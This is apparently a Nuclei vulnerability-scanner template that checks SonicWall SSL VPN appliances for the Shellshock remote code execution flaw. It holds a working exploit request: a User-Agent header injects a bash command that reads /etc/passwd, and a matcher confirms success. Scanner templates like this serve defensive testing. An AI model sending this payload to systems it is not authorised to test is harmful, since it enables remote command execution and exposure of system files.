id: sonicwall-sslvpn-shellshock

info:
  name: Sonicwall SSLVPN ShellShock RCE
  author: PR3R00T
  severity: critical
  reference: |
      - https://twitter.com/chybeta/status/1353974652540882944
      - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

requests:
  - raw:
      - |
        GET /cgi-bin/jarrewrite.sh HTTP/1.1
        Host: {{Hostname}}
        User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
        Accept: */*
        Accept-Language: en
        Connection: close

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
        part: body
      - type: status
        status:
          - 200